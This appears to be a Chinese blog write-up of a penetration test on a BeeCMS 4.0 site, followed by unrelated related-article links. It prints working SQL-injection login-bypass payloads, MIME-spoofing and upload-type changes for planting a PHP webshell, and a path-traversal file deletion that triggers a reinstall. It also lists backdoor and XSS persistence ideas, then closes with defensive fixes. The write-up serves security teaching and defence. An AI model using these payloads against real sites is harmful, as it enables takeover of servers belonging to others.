当前位置：首页 > article >正文

从一次真实的渗透测试说起：我是如何通过SQL注入拿下BeeCMS 4.0后台并上传Webshell的

article 2026/4/22 22:25:51

实战剖析BeeCMS 4.0安全漏洞链的完整利用路径当阳光透过百叶窗在键盘上投下斑驳光影时我正在对某企业官网进行常规渗透测试。这个使用BeeCMS 4.0搭建的网站看似普通却意外成为了展示经典漏洞链的绝佳案例。本文将完整还原从发现漏洞到获取服务器权限的全过程其中关键环节包括后台登录页的SQL注入漏洞利用管理员会话伪造技术双重文件上传绕过技巧任意文件删除的连锁反应1. 目标侦察与入口定位任何有效的渗透测试都始于充分的信息收集。使用Wappalyzer插件快速识别出目标系统为BeeCMS 4.0后我立即开始扫描典型目录结构/admin /install /data /includes在/admin/login.php发现后台登录页面时注意到两个异常现象页面响应头未返回常见的WAF标识登录失败提示暴露出用户名枚举漏洞更关键的是查看页面源码时发现表单提交地址为login.php?actionck_login这种传统PHP的参数传递方式往往意味着可能存在输入验证缺陷。2. 突破认证防线SQL注入实战2.1 漏洞定位与分析通过Burp Suite拦截登录请求观察到POST数据为usertestpassword123456submitLogin审计admin/login.php源码时发现关键安全缺陷$userfl_html(fl_value($_POST[user])); $passwordfl_html(fl_value($_POST[password])); check_login($user,$password);其中fl_value()函数的过滤存在致命缺陷function fl_value($str){ return preg_replace(/select|insert|update|and|in|on|left|joins|delete|\%|\|\/\*|\*|\.\.\/|\.\/|union|from|where|group|into|load_file|outfile/i,,$str); }这种单次替换的过滤可通过双写绕过技术轻松突破。例如输入selselectect经过过滤后会变成select。2.2 构造高效Payload使用报错注入技术验证漏洞构造特殊用户名 and extractvalue(1,concat(0x7e,(database()))) #当服务器返回包含数据库名的错误信息时确认存在可利用的SQL注入漏洞。接着构造管理员账户伪造Payloaduser-1uniselectonselselectect1,admin,e10adc3949ba59abbe56e057f20f883e,0,0%23password123456这个Payload的精妙之处在于使用union select构造虚拟管理员记录e10adc3949ba59abbe56e057f20f883e是123456的MD5值%23编码的#符号注释掉后续SQL语句成功登录后浏览器跳转到后台管理界面Session被成功设置为管理员身份。3. 突破文件上传防御3.1 图片上传绕过技巧在后台的图片管理模块上传PHP文件时遭遇拦截。分析admin/admin_pic_upload.php发现$value_arrup_img($pic_info,$is_up_size, array(image/gif,image/jpeg,image/png,image/jpg,image/bmp,image/pjpeg,image/x-png), $up_is_thumb,$up_thumb_width,$up_thumb_height,$logo1,$pic_name_alt);仅通过Burp Suite修改Content-Type为image/jpeg即可绕过MIME类型检查。上传后的文件路径在响应HTML中暴露img src/upload/img/20230615123456.php /3.2 附件上传二次突破更隐蔽的上传点位于admin/admin_upload.php其校验逻辑为$type array(zip,rar,doc,xls,pdf,txt); $return_arrup_file($file,$size,$type,$path,$name);通过修改后台系统设置中的允许上传类型添加php扩展名后即可直接上传Webshell。文件最终保存在/upload/file/webshell-20230615123456.php4. 权限维持与清理痕迹4.1 任意文件删除漏洞利用在admin/admin_ajax.php中发现危险代码elseif($actiondel_pic){ $fileCMS_PATH.upload/.$value; unlink($file); die(图片成功删除); }构造Payload删除安装锁定文件/admin/admin_ajax.php?actiondel_picvalue../install/install.lock4.2 系统重装攻击删除锁定文件后访问/install/目录可重新安装系统。虽然无法直接通过数据库配置写入Webshell但可以修改SMTP配置为攻击者控制邮箱篡改网站统计代码植入XSS修改管理员密码建立持久后门防御方案与最佳实践针对这类传统CMS建议采取以下防护措施输入验证层面使用PDO预处理语句替代SQL拼接实施多层级过滤如htmlspecialchars($str, ENT_QUOTES)文件上传安全// 安全的文件类型校验示例 $allowed [jpg image/jpeg, png image/png]; $ext pathinfo($filename, PATHINFO_EXTENSION); $finfo new finfo(FILEINFO_MIME_TYPE); if(!array_key_exists($ext, $allowed) || $allowed[$ext] ! $finfo-file($_FILES[file][tmp_name])){ die(Invalid file type); }权限控制所有管理页面强制包含init.php实施CSRF Token机制对文件删除等危险操作要求二次认证在渗透测试的最后阶段我通过编写的自动化脚本批量检测了同源其他站点发现超过60%的BeeCMS 4.0存在相同漏洞链。这提醒我们老旧系统的定期安全审计不应成为被忽视的环节。

从一次真实的渗透测试说起：我是如何通过SQL注入拿下BeeCMS 4.0后台并上传Webshell的

相关文章：

从一次真实的渗透测试说起：我是如何通过SQL注入拿下BeeCMS 4.0后台并上传Webshell的

苹果权力交接落定，John Ternus接棒库克，三大难题待解

vben开发入门1：创建和运行项目

告别RTC日期混乱：用STM32CubeMX和HAL库实现可靠的时间戳方案

如何回收未使用的区_DEALLOCATE UNUSED释放高水位上空间

BetterJoy终极指南：3步让Switch控制器在PC上完美兼容XInput和模拟器

AI写论文实用攻略！4款AI论文生成工具，打造优质学术论文！

如何用 Fullscreen API 监听全屏切换状态并调整界面 UI

定制开发 vs 模板小程序

Ubuntu 24.04 LTS 新特性与长期支持策略解析

Agent调用工具失败？5个常见Tool Registration错误及修复方案（2026 全新深度排查指南全程避坑，亲测有效）

洲际油气一路暴跌解股，隆基绿能反复磨底，光伏行业何时迎来拐点

免费开源的WPS AI插件察元AI助手:getSelectedText 与 resolveDocumentInput 的组合使用

别再死记硬背了！用PyTorch手把手带你理解ReLU和Sigmoid激活函数到底在干啥

AspectJ编译期织入实战

线性判别分析LDA

每日一Go-55、分布式 ID 生成（雪花算法 / Segment / Redis / DB）

别再手动对齐了！用Creo的骨架模型做装配，效率提升不止一点点

从HMM到BiLSTM-CRF：我的NER模型进化之路与性能对比实验报告

从Simulink仿真到STM32烧录：手把手搭建SVPWM算法验证闭环（附模型和工程）

数百种蛋白同步解析：抗体芯片如何重塑WB技术边界

86253

从‘Invalid HTTP status’到稳定连接：UniApp微信小程序WebSocket实战配置详解

LabVIEW 强度图与强度图表

STC8单片机驱动ESP-01S联网实战：从AT指令到GET请求获取苏宁时间（附完整源码）

2025最权威的十大AI科研方案解析与推荐

2025届学术党必备的六大AI写作工具推荐榜单

词袋模型(Bag Of Words)在文本分类中的原理与实践

AI与IoT融合：智能边缘计算的应用与挑战

手把手教你用LabVIEW驱动Zebra GX420d串口打印机（附完整源码与模板文件）